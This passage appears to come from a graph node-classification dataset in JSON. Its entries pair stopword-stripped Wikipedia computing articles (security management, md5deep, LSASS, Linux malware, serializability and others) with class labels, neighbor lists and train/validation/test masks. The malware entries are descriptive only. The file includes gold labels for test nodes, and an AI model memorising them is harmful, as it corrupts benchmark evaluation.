plans specific internal organization entity service provider besides input sla plan sub-process also works policy statements service provider said earlier policy statements defined control sub-process operational level agreements information security set implemented based itil process requires cooperation itil processes example security management wishes change infrastructure order enhance security changes done change management process security management delivers input request change change change manager responsible change management process plan consists combination unordered ordered sub activities sub-process contains three complex activities closed activities one standard activity control sub-process plan sub-process modeled using meta-modeling technique left side figure 2.2.1 meta-data model plan sub-process plan rectangle open complex concept aggregation type relationship two closed complex concepts one standard concept two closed concepts expanded particular context following picture figure 2.2.1 process-data diagram plan sub-process picture shows integration two models dotted arrows indicate concepts created adjusted corresponding activities plan sub-process figure 2.2.1 process-data model plan sub-process implementation sub-process makes sure measures specified plans properly implemented implementation sub-process measures defined changed definition change measures takes place plan sub-process cooperation change management process left side figure 2.3.1 meta-process model implementation phase four labels black shadow mean activities closed concepts expanded context arrows connect four activities meaning activities unordered reporting carried completion four activities implementation phase concepts created /or adjusted concepts created and/or adjusted modeled using meta-modeling technique right side figure 2.3.1 meta-data model implementation sub-process implementation documents open concept expanded upon context consists four closed concepts expanded irrelevant particular context order make relations two models clearer integration two models illustrated figure 2.3.1 dotted arrows running activities concepts illustrate concepts created/ adjusted corresponding activities figure 2.3.1 process-data model implementation sub-process evaluation necessary measure success implementation security plans evaluation important clients possibly third parties results evaluation sub-process used maintain agreed measures implementation evaluation results lead new requirements corresponding request change request change defined sent change management three sorts evaluation self-assessment internal audit external audit self-assessment mainly carried organization processes internal audits carried internal it-auditors external audits carried external independent it-auditors besides already mentioned evaluation based communicated security incidents occurs important activities evaluation security monitoring it-systems verify security legislation security plan implementation trace react undesirable use it-supplies figure 2.4.1 process-data model evaluation sub-process process-data diagram illustrated figure 2.4.1 consists meta-process model meta-data model evaluation sub-process modeled using meta-modeling technique dotted arrows running meta-process diagram left meta-data diagram right indicate concepts created/ adjusted corresponding activities activities evaluation phase standard activities short description evaluation phase concepts see table 2.4.2 concepts listed defined table 2.4.2 concept definition evaluation sub-process security management organizational it-infrastructure changes security risks change time requiring revisions security section service level agreements security plans maintenance based results evaluation sub-process insight changing risks activities produce proposals proposals either serve inputs plan sub-process travel cycle adopted part maintaining service level agreements cases proposals could lead activities action plan actual changes made change management process figure 2.5.1 process-data diagram implementation sub-process picture shows integration meta-process model left meta-data model right dotted arrows indicate concepts created adjusted activities implementation phase figure 2.5.1 process-data model maintenance sub-process maintenance sub-process starts maintenance service level agreements maintenance operational level agreements activities take place particular order request change request change activity take place request change activity concluded reporting activity starts request change reporting activity start directly first two activities concepts meta-data model created/ adjusted maintenance phase list concepts definition take look table 2.5.2 table 2.5.2 concept definition plan sub-process security management figure 2.6.1 complete process-data model security management process security management process stated introduction relations almost itil-processes processes within processes activities concerning security required concerning process process manager responsible activities however security management gives indications concerning process structure activities internal e-mail subject multiple security risks requiring corresponding security plan policies example itil security management approach used implement e-mail policies security management team formed process guidelines formulated communicated employees providers actions carried control phase subsequent planning phase policies formulated policies specific e-mail security formulated added service level agreements end phase entire plan ready implemented implementation done according plan implementation policies evaluated either self-assessments via internal external auditors maintenance phase e-policies adjusted based evaluation needed changes processed via requests change",
    "neighbors": [
      5373,
      3125
    ],
    "mask": "None"
  },
  {
    "node_id": 3393,
    "label": 4,
    "text": "Md5deep:md5deep md5deep software package used computer security system administration computer forensics communities run large numbers files several different cryptographic digests originally authored jesse kornblum time special agent air force office special investigations still maintains name md5deep misleading version 2.0 md5deep package contains several different programs able perform md5 sha-1 sha-256 tiger192 whirlpool digests named digest type followed word deep thus name may confuse people thinking provides md5 algorithm package supports many md5deep invoked several different ways typically users operate recursively md5deep walks one directory time giving digests file found recursing subdirectories within recursive behavior approximately depth-first search benefit presenting files lexicographical order unix-like systems similar functionality often obtained combining find hashing utilities md5sum sha256sum tthsum md5deep exists windows unix-based systems including os x present os x fink homebrew macports projects binary packages exist free unix systems many vendors initially resist including md5deep mistakenly believe functions reproduced one line shell scripting matching function program however done easily shell md5deep written employee u.s. government government time public domain software surrounding graphical front-ends may copyrighted",
    "neighbors": [
      2432,
      4834,
      1379,
      741,
      9319,
      5612,
      6797,
      7983,
      9487,
      5492,
      5397,
      11221,
      6238,
      2558
    ],
    "mask": "None"
  },
  {
    "node_id": 3394,
    "label": 2,
    "text": "Local_Security_Authority_Subsystem_Service:local security authority subsystem service local security authority subsystem service lsass process microsoft windows operating systems responsible enforcing security policy system verifies users logging windows computer server handles password changes creates access tokens also writes windows security log forcible termination lsass.exe result welcome screen losing accounts prompting restart machine lsass.exe crucial system file name often faked malware lsass.exe file used windows located directory codice_1 running location lsass.exe likely virus spyware trojan worm due way systems display fonts malicious developers may name file something like isass.exe capital instead lowercase l efforts trick users installing executing malicious file instead trusted system file",
    "neighbors": [
      10756,
      11270,
      5643,
      4624,
      537,
      540,
      3102,
      9762,
      8227,
      8740,
      7207,
      1577,
      10281,
      2101,
      7739,
      10812,
      3648,
      10310,
      1098,
      7754,
      10828,
      4173,
      4174,
      9808,
      4178,
      10839,
      603,
      9819,
      93,
      3170,
      622,
      9839,
      4210,
      7796,
      1656,
      6265,
      7290,
      4731,
      10879,
      8841,
      6797,
      2193,
      9874,
      10900,
      4248,
      10392,
      7838,
      9377,
      3235,
      4771,
      6820,
      1703,
      2221,
      5300,
      7351,
      10428,
      2749,
      2244,
      8391,
      200,
      9420,
      2782,
      9442,
      4836,
      4326,
      2279,
      1770,
      3308,
      2801,
      10993,
      3834,
      1791,
      8959,
      11519,
      7426,
      3856,
      3351,
      8473,
      8985,
      3867,
      8988,
      11546,
      5413,
      5928,
      3881,
      10024,
      10026,
      10029,
      7983,
      1844,
      9525,
      11572,
      10039,
      6972,
      4423,
      3922,
      4439,
      5465,
      2402,
      2919,
      4458,
      6506,
      9066,
      9593,
      2943,
      1418,
      5003,
      5004,
      8080,
      11677,
      929,
      11683,
      430,
      6062,
      10673,
      9655,
      6584,
      1978,
      7098,
      960,
      3522,
      8132,
      4552,
      969,
      6088,
      3535,
      8659,
      1498,
      5594,
      478,
      6114,
      6115,
      6637,
      9709,
      6641,
      3573,
      2041
    ],
    "mask": "Validation"
  },
  {
    "node_id": 3395,
    "label": 2,
    "text": "Linux_malware:linux malware linux malware includes viruses trojans worms types malware affect linux operating system linux unix unix-like computer operating systems generally regarded well-protected immune computer viruses 2018 yet single widespread linux virus malware infection type common microsoft windows attributable generally malware lack root access fast updates linux vulnerabilities like unix systems linux implements multi-user environment users granted specific privileges form access control implemented gain control linux system cause serious consequences system malware would gain root access system past suggested linux little malware low market share made less profitable target rick moen experienced linux system administrator counters 2008 quantity malware targeting linux noted increasing shane coursen senior technical consultant kaspersky lab said time growth linux malware simply due increasing popularity particularly desktop operating system ... use operating system directly correlated interest malware writers develop malware os tom ferris researcher security protocols commented one kaspersky reports stating people minds non-windows secure case think nobody writes malware linux mac os x necessarily true linux users run linux-based anti-virus software scan insecure documents email comes going windows users securityfocus scott granneman stated predominantly used mail servers may send mail computers running operating systems linux virus scanners generally use definitions scan known viruses computer platforms example open source clamav detects ... viruses worms trojans including microsoft office macro viruses mobile malware threats viruses listed pose potential although minimal threat linux systems infected binary containing one viruses run system would temporarily infected linux kernel memory resident read-only infection level would depend user privileges ran binary binary run root account would able infect entire system privilege escalation vulnerabilities may permit malware running limited account infect entire system worth noting true malicious program run without special steps taken limit privileges trivial add code snippet program user may download let additional code download modified login server open mail relay similar program make additional component run time user logs special malware writing skills needed special skill may needed tricking user run trojan program first place use software repositories significantly reduces threat installation malware software repositories checked maintainers try ensure repository malware-free subsequently ensure safe distribution software checksums made available make possible reveal modified versions may introduced e.g hijacking communications using man-in-the-middle attack via redirection attack arp dns poisoning careful use digital signatures provides additional line defense limits scope attacks include original authors package release maintainers possibly others suitable administrative access depending keys checksums handled reproducible builds ensure digitally signed source code reliably transformed binary application classical threat unix-like systems vulnerabilities network daemons ssh web servers used worms attacks specific targets servers patched quite quickly vulnerability found widespread worms kind specific targets attacked vulnerability publicly known guarantee certain installation secure also servers without vulnerabilities successfully attacked weak passwords linux servers may also used malware without attack system e.g web content scripts insufficiently restricted checked used malware attack visitors attacks use complicated malware attack linux servers get full root access hackers able attack modifying anything like replacing binaries injecting modules may allow redirection users different content web typically cgi script meant leaving comments could mistake allow inclusion code exploiting vulnerabilities web browser older linux distributions relatively sensitive buffer overrun attacks program care size buffer kernel provided limited protection allowing attacker execute arbitrary code rights vulnerable application attack programs gain root access even launched non-root user via setuid bit particularly attractive attack however 2009 kernels include address space layout randomization aslr enhanced memory protection extensions making attacks much difficult arrange area concern identified 2007 cross-platform viruses driven popularity cross-platform applications brought forefront malware awareness distribution openoffice.org virus called badbunny stuart smith symantec wrote following makes virus worth mentioning illustrates easily scripting platforms extensibility plug-ins activex etc abused often forgotten pursuit match features another vendor ... ability malware survive cross-platform cross-application environment particular relevance malware pushed via web sites long someone uses something like drop javascript infecter web server regardless platform case operating system linux vulnerable malware tricks user installing social engineering december 2009 malicious waterfall screensaver contained script used infected linux pc denial-of-service attacks discovered number anti-virus applications available run linux operating system applications looking exploits could affect users microsoft windows applications useful computers typically servers pass files ms windows users look linux-specific threats applications look actual threats linux computers running linux malware also detected analyzed using memory forensics tools following following partial list known linux malware however wild rendered obsolete linux updates never threat known malware even important threat new malware attacks directed specific sites use vulnerabilities previously unknown community unused malware",
    "neighbors": [
      3072,
      5636,
      10245,
      10756,
      9227,
      9233,
      9242,
      10780,
      9761,
      3618,
      9256,
      9771,
      5176,
      10297,
      3643,
      7739,
      9791,
      1088,
      10817,
      4165,
      8805,
      107,
      7804,
      5245,
      127,
      7809,
      6786,
      131,
      5764,
      7812,
      8326,
      9353,
      9356,
      6797,
      2195,
      4245,
      10392,
      1690,
      11418,
      1694,
      5281,
      2213,
      700,
      704,
      8387,
      202,
      4314,
      3807,
      1761,
      4841,
      4344,
      3320,
      4863,
      1279,
      7938,
      4360,
      7441,
      8978,
      4883,
      1813,
      278,
      5397,
      3867,
      8998,
      300,
      7983,
      4403,
      823,
      9536,
      9537,
      3395,
      7515,
      2399,
      9569,
      3941,
      11621,
      2409,
      877,
      5492,
      9591,
      6013,
      7044,
      4493,
      9102,
      11155,
      10141,
      8615,
      939,
      4011,
      9646,
      1970,
      2485,
      4023,
      6588,
      9660,
      7618,
      5067,
      2508,
      5069,
      6092,
      6606,
      8147,
      2005,
      3032,
      9187,
      8170,
      5612,
      2041,
      3581
    ],
    "mask": "None"
  },
  {
    "node_id": 3396,
    "label": 3,
    "text": "Eddie_Kidd_Jump_Challenge:eddie kidd jump challenge eddie kidd jump challenge stunt bike video game released acorn electron bbc micro commodore 64 msx zx spectrum first released 1984 licensed british stunt performer eddie kidd player takes role eddie kidd must make series jumps like real kidd player must start jumping bmx oil barrels work jumping cars motorbike player starts riding away jump get big enough run must set correct speed correctly selecting gears hit ramp enough speed clear obstacles much miss landing ramp air player lean forward back land correctly game first released late 1984 zx spectrum published software communications martech label version ported msx 1985 similar version released bbc micro acorn electron modified version game much zoomed camera angle screen display released commodore 64 also 1985 game cassette came sticker numbered competition entry card could used win prizes including bmx bikes computers tvs game reissued budget price part mastertronic ricochet label 1987 crash gave game overall score 56 concluding good simulation game exciting particularly addictive difficulty curve criticised early bmx-based levels skipped described doddle skill mastered game holds challenge clare edgeley sinclair user agreed replay bmx section failing advanced jumps seems waste time gave similar score 6/10 computer video games gave scores 7/10 8/10 particularly praising zoomed graphics improved sound commodore 64 version calling superb outshining spectrum game miles",
    "neighbors": [
      10931,
      9006
    ],
    "mask": "Test"
  },
  {
    "node_id": 3397,
    "label": 0,
    "text": "Automated_Similarity_Judgment_Program:automated similarity judgment program automated similarity judgment program asjp collaborative project applying computational approaches comparative linguistics using database word lists database open access consists 40-item basic-vocabulary lists well half world languages continuously expanded addition isolates languages demonstrated genealogical groups database includes pidgins creoles mixed languages constructed languages words database transcribed simplified standard orthography asjpcode database used estimate dates language families diverged daughter languages method related still different glottochronology determine homeland urheimat proto-language investigate sound symbolism evaluate different phylogenetic methods several purposes asjp originally developed means objectively evaluating similarity words meaning different languages ultimate goal classifying languages computationally based lexical similarities observed first asjp paper two semantically identical words compared languages judged similar showed least two identical sound segments similarity two languages calculated percentage total number words compared judged similar method applied 100-item word lists 250 languages language families including austroasiatic indo-european mayan muskogean asjp consortium founded around 2008 came involve around 25 professional linguists interested parties working volunteer transcribers and/or extending aid project ways main driving force behind founding consortium cecil h. brown søren wichmann daily curator project third central member consortium eric w. holman created software used project word lists used originally based 100-item swadesh list statistically determined subset 40 100 items produced good slightly better classificatory results whole list subsequently word lists gathered contain 40 items less attestations lacking papers published since 2008 asjp employed similarity judgment program based levenshtein distance ld approach found produce better classificatory results measured expert opinion method used initially ld defined minimum number successive changes necessary convert one word another change insertion deletion substitution symbol within levenshtein approach differences word length corrected dividing ld number symbols longer two compared words produces normalized ld ldn ldn divided ldnd two languages calculated dividing average ldn word pairs involving meaning average ldn word pairs involving different meanings second normalization intended correct chance similarity asjp uses following 40-word list similar swadesh–yakhontov list differences asjp version 2016 uses following symbols encode phonemes p b f v w 8 z c n r l z c j 5 k g x n q x h 7 l 4 g e e 3 u represent 7 vowels 34 consonants found standard qwerty keyboard",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 3398,
    "label": 1,
    "text": "Serializability:serializability concurrency control databases transaction processing transaction management various transactional applications e.g. transactional memory software transactional memory centralized distributed transaction schedule serializable outcome e.g. resulting database state equal outcome transactions executed serially i.e without overlapping time transactions normally executed concurrently overlap since efficient way serializability major correctness criterion concurrent transactions executions considered highest level isolation transactions plays essential role concurrency control supported general purpose database systems strong strict two-phase locking ss2pl popular serializability mechanism utilized database systems various variants since early days 1970s serializability theory provides formal framework reason analyze serializability techniques though mathematical nature fundamentals informally without mathematics notation introduced serializability used keep data data item consistent state serializability property transaction schedule history relates isolation property database transaction schedules serializable likely generate erroneous outcomes well known examples transactions debit credit accounts money related schedules serializable total sum money may preserved money could disappear generated nowhere violations possibly needed invariant preservations caused one transaction writing stepping erasing written another transaction become permanent database happen serializability maintained specific order transactions requested application enforced independently underlying serializability mechanisms mechanisms typically indifferent specific order generate unpredictable partial order typically compatible multiple serial orders transactions partial order results scheduling orders concurrent transactions data access operations depend many factors major characteristic database transaction atomicity means either commits i.e. operations results take effect database aborts rolled-back operations results effect database nothing semantics transaction real systems transactions abort many reasons serializability sufficient correctness schedules also need possess recoverability abort property recoverability means committed transactions read data written aborted transactions whose effects exist resulting database states serializability currently compromised purpose many applications better performance cases application correctness harmed compromising recoverability would quickly violate database integrity well transactions results external database schedule recoverability property recoverable schedule recovers aborts i.e. aborts harm integrity committed transactions resulting database false without recoverability likely integrity violations resulting incorrect database data need special typically manual corrective actions database implementing recoverability general form may result cascading aborts aborting one transaction may result need abort second transaction third results waste already partially executed transactions may result also performance penalty avoiding cascading aborts aca cascadelessness special case recoverability exactly prevents phenomena often practice special case aca utilized strictness strictness allows efficient database recovery failure note recoverability property needed even database failure occurs database recovery failure needed rather needed correctly automatically handle aborts may unrelated database failure recovery failure many applications unlike finances absolute correctness needed example retrieving list products according specification cases matter much product whose data updated short time ago appear list even meets specification typically appear list tried short time later commercial databases provide concurrency control whole range isolation levels fact controlled serializability violations order achieve higher performance higher performance means better transaction execution rate shorter average transaction response time transaction duration snapshot isolation example popular widely utilized efficient relaxed serializability method many characteristics full serializability still short unfit many situations another common reason nowadays distributed serializability relaxation see requirement availability internet products services requirement typically answered large-scale data replication straightforward solution synchronizing replicas updates database object including updates single atomic distributed transaction however many replicas transaction large may span enough number several computers networks likely unavailable thus transaction likely end abort miss purpose consequently optimistic replication lazy replication often utilized e.g. many products services google amazon yahoo like serializability relaxed compromised eventual consistency case relaxation done applications expected harmed technique classes schedules defined relaxed serializability properties either contain serializability class incomparable mechanisms enforce serializability need execute real time almost real time transactions running high rates order meet requirement special cases serializability sufficient conditions serializability enforced effectively utilized two major types serializability exist view-serializability conflict-serializability view-serializability matches general definition serializability given conflict-serializability broad special case i.e. schedule conflict-serializable also view-serializable necessarily opposite conflict-serializability widely utilized easier determine covers substantial portion view-serializable schedules determining view-serializability schedule np-complete problem class problems difficult-to-compute excessively time-consuming known solutions operations upon data read write write either insert modify delete two operations conflicting different transactions upon datum data item least one write pair conflicting operations conflict type either read-write write-read write-write conflict transaction second operation pair said conflict transaction first operation general definition conflicting operations also complex operations may consist several simple read/write operations requires noncommutative changing order also changes combined result operation needs atomic using proper system support order considered operation commutativity check example read-read operations commutative unlike read-write possibilities thus read-read conflict another complex example operations increment decrement counter write operations modify counter need considered conflicting write-write conflict type since commutative thus increment-decrement conflict e.g. already supported old ibm ims fast path precedence time order pairs conflicting non-commutative operations important checking equivalence serial schedule since different schedules consisting transactions transformed one another changing orders different transactions operations different transactions interleaving since changing orders commutative operations non-conflicting change overall operation sequence result i.e. schedule outcome outcome preserved order change non-conflicting operations typically conflicting operations change order means schedule transformed serial schedule without changing orders conflicting operations changing orders non-conflicting preserving operation order inside transaction outcome schedules schedule conflict-serializable definition conflicts reason blocking transactions delays non-materialized conflicts aborting transactions due serializability violation prevention possibilities reduce performance thus reducing number conflicts e.g. commutativity possible way increase performance transaction issue/request conflicting operation conflict another transaction conflicting operation delayed executed e.g. blocked lock executed materialized conflicting operations relevant conflict serializability see schedule compliance conflict serializability tested precedence graph serializability graph serialization graph conflict graph committed transactions schedule directed graph representing precedence transactions schedule reflected precedence conflicting operations transactions following observation key characterization conflict serializability cycles committed transactions prevented aborting undecided neither committed aborted transaction cycle precedence graph transactions otherwise turn cycle committed transactions committed transaction aborted one transaction aborted per cycle required sufficient number break eliminate cycle aborts possible happen mechanisms unnecessary serializability probability cycle generation typically low nevertheless situation carefully handled typically considerable amount overhead since correctness involved transactions aborted due serializability violation prevention restarted executed immediately serializability-enforcing mechanisms typically maintain precedence graph data structure rather prevent break cycles implicitly e.g. ss2pl strong strict two-phase locking ss2pl common mechanism utilized database systems since early days 1970s ss name ss2pl newer though enforce conflict serializability strictness special case recoverability allows effective database recovery failure schedule mechanism datum locked transaction accessing read write operation item marked associated lock certain type depending operation performed specific transaction implementation various models different lock types exist models locks may change type transaction life result access another transaction may blocked typically upon conflict lock delays completely prevents conflict materialized reflected precedence graph blocking conflicting operation depending lock type transaction access operation type employing ss2pl mechanism means locks data behalf transaction released transaction ended either committed aborted ss2pl name resulting schedule property well also called rigorousness ss2pl special case proper subset two-phase locking 2pl mutual blocking transactions results deadlock execution transactions stalled completion reached thus deadlocks need resolved complete transactions execution release related computing resources deadlock reflection potential cycle precedence graph would occur without blocking conflicts materialized deadlock resolved aborting transaction involved potential cycle breaking cycle often detected using wait-for graph graph conflicts blocked locks materialized also defined graph non-materialized conflicts conflicts materialized reflected precedence graph affect serializability indicates transaction waiting release one locks transaction transactions cycle graph means deadlock aborting one transaction per cycle sufficient break cycle transactions aborted due deadlock resolution restarted executed immediately known mechanisms include conflict serializability techniques general form provide recoverability special enhancements needed adding recoverability concurrency control techniques three major types main differences technique types conflict types generated pessimistic method blocks transaction operation upon conflict generates non-materialized conflict optimistic method block generates materialized conflict semi-optimistic method generates conflict types conflict types generated chronological orders transaction operations invoked independently type conflict cycle committed transactions materialized conflicts precedence graph conflict graph represents serializability violation avoided maintaining serializability cycle non-materialized conflicts wait-for graph represents deadlock situation resolved breaking cycle cycle types result conflicts broken technique type conflicts detected considered similar overhead materialized non-materialized conflicts typically using mechanisms like locking either blocking locks blocking recording conflict materialized conflicts blocking method typically context switching occurs upon conflict additional incurred overhead otherwise blocked transactions related computing resources remain idle unutilized may worse alternative conflicts occur frequently optimistic methods typically advantage different transaction loads mixes transaction types one technique type i.e. either optimistic pessimistic may provide better performance unless schedule classes inherently blocking i.e. implemented without data-access operations blocking e.g. 2pl ss2pl sco see chart also implemented using optimistic techniques e.g. serializability recoverability multi-version concurrency control mvcc common way today increase concurrency performance generating new version database object time object written allowing transactions read operations several last relevant versions object depending scheduling method mvcc combined serializability techniques listed except serializablesi originally mvcc-based utilized general-purpose dbms products mvcc especially popular nowadays relaxed serializability see method snapshot isolation si provides better performance known serializability mechanisms cost possible serializability violation certain cases serializablesi efficient enhancement si make serializable intended provide efficient serializable solution serializablesi analyzed via general theory mvcc distributed serializability serializability schedule transactional distributed system e.g. distributed database system system characterized distributed transactions also called global transactions i.e. transactions span computer processes process abstraction general sense depending computing environment e.g. operating system thread possibly network nodes distributed transaction comprises one several local sub-transactions states described database transaction local sub-transaction comprises single process processes typically fail together e.g. single processor core distributed transactions imply need atomic commit protocol reach consensus among local sub-transactions whether commit abort protocols vary simple one-phase handshake among processes fail together sophisticated protocols like two-phase commit handle complicated cases failure e.g. process node communication etc failure distributed serializability major goal distributed concurrency control correctness proliferation internet cloud computing grid computing small portable powerful computing devices e.g. smartphones need effective distributed serializability techniques ensure correctness among distributed applications seems increase distributed serializability achieved implementing distributed versions known centralized techniques typically distributed versions require utilizing conflict information either materialized non-materialized conflicts equivalently transaction precedence blocking information conflict serializability usually utilized generated locally rather different processes remote locations thus information distribution needed e.g. precedence relations lock information timestamps tickets distributed system relatively small scale message delays across system small centralized concurrency control methods used unchanged certain processes nodes system manage related algorithms however large-scale system e.g. grid cloud due distribution information substantial performance penalty typically incurred even distributed versions methods vs. centralized ones used primarily due computer communication latency also information distributed related techniques typically scale well well-known example respect scalability problems distributed lock manager distributes lock non-materialized conflict information across distributed system implement locking techniques",
    "neighbors": [
      9224,
      11024,
      7446,
      1049,
      5658,
      7581,
      1701,
      7983,
      1083,
      9663,
      5441,
      5956,
      3398,
      5452,
      4308,
      2901,
      10201,
      8539,
      4194,
      11620,
      1382,
      9069,
      11377,
      3326
    ],
    "mask": "Test"
  },
  {
    "node_id": 3399,
    "label": 5,
    "text": "AICCU:aiccu aiccu automatic ipv6 connectivity client utility popular cross-platform utility automatically configuring ipv6 tunnel free software available bsd license utility originally provided sixxs tunnel broker also used variety tunnel brokers aiccu written maintained jeroen massar various patches persons incorporated persons acknowledged field contributions aiccu successor windows-only linux/bsd-variety heartbeat tool provided sixxs solely use heartbeat protocol ayiya protocol came existence decided support new protocol would better merge windows unix trees one program give better appearance name heartbeat tool changed reflect providing mere support heartbeats aiccu award excellence implementation category 2004 edition ipv6 application contest following tunneling protocols currently supported aiccu primarily uses tic protocol retrieve configuration parameters tunnel automatically user wants configured aiccu finds available tunnel brokers looking txt dns records _aiccu.sixxs.net latter allows local network add tunnel broker adding records domains configured search path non-local tunnel brokers added requesting sixxs staff add entry global dns records following operating systems/platforms/distributions supported aiccu various distributions aiccu package included distribution main usage aiccu combination sixxs tunnel broker service isps implemented parts protocols aiccu support instance czech isp netbox uses aiccu configure tunnels automatically users providing tic tunnel information control protocol implementation ignores username/password/tunnel_id uses source address tic connection originates determine return tunnel configuration using tic protocol aiccu uses configure tunnel",
    "neighbors": [
      9320,
      5612,
      6797,
      9868,
      7983,
      823,
      6361,
      2045,
      5470
    ],
    "mask": "Train"
  },
  {
    "node_id": 3400,
    "label": 1,
    "text": "Empress_Embedded_Database:empress embedded database empress embedded database relational database management system embedded applications including medical systems network routers nuclear power plant monitors satellite management systems empress acid compliant relational database management system rdbms two-phase commit several transaction isolation levels real-time embedded applications supports persistent in-memory storage data works text binary multimedia well traditional data first version empress created john kornatowski ivor ladd 1979 originally named mistress based research done mrs microcomputer database management system university toronto published association computing machinery sigsmall sigmod 1981 commercial version one first available relational database management systems rdbms named empress first customer ship early 1981 empress first commercial database available linux linux release dates back early 1995 empress supports many application programming interfaces several programming languages c programming language apis including low-level kernel mr routines embedded sql mscall odbc also apis c++ java layered architecture design provides levels system optimization application development applications developed using apis may run standalone and/or server modes empress runs major android linux- real-time- windows-supported platforms",
    "neighbors": [
      10048,
      321,
      9353,
      10921,
      5612,
      3629,
      10286,
      7983,
      10413,
      5492,
      10389,
      823,
      1304,
      8188
    ],
    "mask": "None"
  },
  {
    "node_id": 3401,
    "label": 8,
    "text": "Analog_(program):analog program analog free web log analysis computer program runs windows mac os linux unix-like operating systems first released june 21 1995 stephen turner generic freeware license changed gnu general public license november 2004 software downloaded several computing platforms source code downloaded compiled desired analog support 35 languages provides ability reverse dns lookups log files indicate web site hits originate analyze several different types web server logs including apache iis iplanet 200 configuration options generate 32 reports also supports log files multiple virtual hosts program comparable webalizer awstats though use many images preferring stick simple bar charts lists communicate similar information analog export reports number formats including html xhtml xml latex delimited output mode example csv importing programs delimited computer output analog often used generate structured graphically rich reports using third party report magic program popularity analog largely unknown download count information released historic dissemination 1998 survey graphic visualization usability center gvu analog reportedly used 24.9 19.9 year nearest rival web trends holding 20.3 market clear analog usage changed decade leading 2010 usage profile impacted on-line analysis services google analytics analog operate individual web-farm basis single process requiring modification web page web script code order use stand-alone utility possible visiting clients block logging traffic directly client analog officially updated since version 6.0 release december 2004 original author moved commercial traffic analysis updates analog continued informally user community end 2009 official mailing list currently formally compiled updated redistributable analog analog ce focused fixing issues analog xml dtd adding new operating system web browser detection original code branch analog first released june 1995 research project creator dr. stephen turner working research fellow sidney sussex college university cambridge larger release milestones include full list changes release recorded analog new changelog full list changes maintenance release recorded analog c amie edition page",
    "neighbors": [
      4640,
      865,
      10814,
      10604,
      823,
      6797,
      7983,
      8941,
      5397,
      1943,
      4439
    ],
    "mask": "None"
  },
  {
    "node_id": 3402,
    "label": 9,
    "text": "Toi_(programming_language):toi programming language toi imperative type-sensitive language provides basic functionality programming language language designed developed ground-up paul longtine written c toi created intent educational experience serves learning tool toy hence name looking familiarize inner-workings programming language 0 void null data runtime context keeps track individual threads metadata context gives definition 'environment code executed key part operational computer language notion 'namespace notion 'namespace refers ability declare name along needed metadata call upon name retrieve values associated name definition namespace provide following key mechanisms scope argument single byte format follows scopes handled referencing either global scope local scope local scope denoted 0 scope argument referring names scope initialized evaluating new block code different block code called new scope added new namespace level namespace levels act context switches within function contexts example local namespace must 'returned local namespace context needs preserved return pushing 'namespace levels ensures every n function calls traverse n instances previous namespaces example take namespace level graphic level namespace instance function called another namespace level created local level increases like global scope names lsb == 1 scope argument persistent runtime handle function definitions objects names declared global scope local level references scope argument 0 refer accessing names namespace argument refers namespace variable exists namespace argument equals 0 current namespace referenced global namespace 1 default namespaces must declared using variables definition provide following mechanisms given variable v v defines following attributes variable handled generic container previous section notion namespace levels introduced much like names scoped generic variable containers must communicate scope terms location within given set scopes called 'ownership given runtime variable containers exist following structures stack instance bytecode arguments namespaces concept ownership differentiates variables existing one structures set place prevent accidental deallocation variable containers copied instead passed references structures functions virtual machine pointer set instructions program metadata parameters defined paradigm objects units encapsulate separate namespace collection methods bytecode arranged following order opcode single byte denoting subroutine call following arguments executed different opcodes different argument lengths 0 arguments others 3 arguments bytecode instruction single-byte opcode followed maximum 3 arguments following forms specification instructions short description instruction instruction category keywords 1 stack manipulation 2 variable management 3 type management types air moment 'll detail types time comes 4 binary ops ops take two top elements stack perform operation push result stack 5 conditional expressions things comparison forth behaves like arithmetic instructions besides instruction pushes boolean tos 6 loops 7 code flow instructions dictate code flow 8 generic object interface expects object tos f functions/classes 0 special bytes going code bytecode section first abstract notation code broken binary tree node argument parent node next instruction instruction nodes nodes produce instruction multiple based bytecode interpretation instruction example line code would translate functions expressed individual binary trees root file treated individual binary tree also function various instruction nodes follows various instruction nodes within tree call specific functions take arguments specified lookahead lookbehind formulate correct bytecode equivalent developer language paul longtine operates publicly available website blog called banna.tech named online alias 'banna",
    "neighbors": [
      1952,
      5635,
      8262,
      655,
      372
    ],
    "mask": "Test"
  },
  {
    "node_id": 3403,
    "label": 3,
    "text": "LGA_2066:lga 2066 lga 2066 also called socket r4 cpu socket intel debuted skylake-x kaby lake-x cascade lake-x processors june 2017 2018 replaces intel lga 2011-3 r3 performance high-end desktop workstation platforms based x299 basin falls c422 chipsets lga 3647 socket p replace lga 2011-3 r3 server platforms based skylake-sp xeon purley desktop processors lga 2066 socket listed table",
    "neighbors": [
      3588,
      5901,
      5649,
      5523,
      2455,
      3992,
      8855,
      11417,
      3995,
      4252,
      6175,
      7714,
      10019,
      4523,
      2604,
      2350,
      6192,
      9649,
      4537,
      7105,
      4805,
      7110,
      8394,
      4427,
      4179,
      2516,
      3798,
      4185,
      7002,
      9945,
      10715,
      11484,
      9570,
      10468,
      613,
      1000,
      8552,
      1260,
      4717,
      10225,
      371,
      9592,
      8442
    ],
    "mask": "None"
  },
  {
    "node_id": 3404,
    "label": 2,
    "text": "OpenBSD_Journal:openbsd journal openbsd journal online newspaper dedicated coverage openbsd software related events openbsd journal founded 2000 operated 1 april 2004 1 april 2004 editors james phillips jose nazario announced site ceased operation daniel hartmeier backed contents journal order preserve investigation articles structure lead creation cgi-based engine would enable access deadly.org content backup server consequently functionality adding new articles implemented previous editors allowed re-publish articles openbsd journal therefore reintroduced 9 april 2004 openbsd journal widely recognized openbsd-related information primary reporter events hackathons site also hosts openbsd developers blogs current editors openbsd journal",
    "neighbors": [
      3975,
      9223,
      2825,
      3465,
      10631,
      1932,
      2193,
      274,
      7702,
      10105,
      6702,
      9520,
      11698,
      2485,
      2245,
      1993,
      8778,
      11086,
      5970,
      5084,
      735,
      865,
      7139,
      1637,
      4071,
      5230,
      119,
      1785,
      8954,
      7547
    ],
    "mask": "None"
  },
  {
    "node_id": 3405,
    "label": 7,
